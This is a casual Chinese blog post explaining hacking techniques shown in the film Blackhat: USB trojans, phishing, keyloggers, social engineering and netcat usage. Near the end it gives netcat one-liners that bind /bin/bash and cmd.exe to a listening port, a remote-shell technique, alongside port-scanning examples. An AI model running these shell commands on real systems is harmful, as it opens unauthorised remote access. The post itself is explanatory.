看完了电影《骇客交锋》,发现里面的一些技术还是真实的,除了命令,还有U盘木马、社会工程学、钓鱼、键盘记录器等,还是挺丰富的,所以写一篇文章记录下。
write命令
write命令可传递信息给另一位登入系统的用户。
cat、xxd命令与U 盘自动执行脚本
cat 打印文件内容到显示器上
xxd 查看Linux文件的二进制表示,在线二进制文件查看器
电影中只有上图这位帅哥有权限打开关键电脑,而且是指纹认证,所以其他人很难开机去操作电脑。但是这个人通常把 U 盘放电脑桌上,也就是他的 U 盘被人动过手脚,拿走写入上面的脚本还回来,他登录电脑插上此 U 盘,上面的特洛伊木马程序 .mssvc 就执行了。
当然故事里给 U 盘动手脚的那个人也只是一个人肉脚本,所以最终是被 kill 了。
洋葱网络
who, whois 命令
通过阅读人肉脚本与凶手的邮件,并通过邮件约到指定地点(Ham Ji Park Restaurant)见面。
频谱分析仪
根据捕捉附近发射的无线电波找到可疑发射源。
钓鱼邮件与键盘记录器
社会工程学与nc命令
Mac 自带nc命令,Windows 需下载nc.exe (https://github.com/diegocr/netcat)
# 传文件, Mac1 监听5901端口,-l 代表监听
Mac1 % nc -l 5901>photoshop.dmg
Mac2 % nc 10.9.9.8 5901 < Adobe_Photoshop_2020_21.0.1.47.dmg
D:\>nc.exe 10.9.9.8 5901 < D:\方案.pptx
# nc聊天
Mac1 % nc -l 1234
D:\>nc.exe -l -p 1234
hello
Mac2 % nc 10.9.9.8 1234
hello
# 端口扫描, -z 代表扫描端口
Mac % nc -z 10.9.9.8 20-444
Connection to 10.9.9.8 port 22 [tcp/ssh] succeeded!
# 反弹服务器shell
Linux1 $ nc -l 6666 -e /bin/bash
Linux2 $ nc 127.0.0.1 6666
[ls
file1
file2
[pwd
/home/root
Win1 $ nc -l -p 6666 -t -e cmd.exe
Win2 $ nc -nvv 10.9.9.8 6666
雷神老师和汤唯老师的教学,你学会了吗?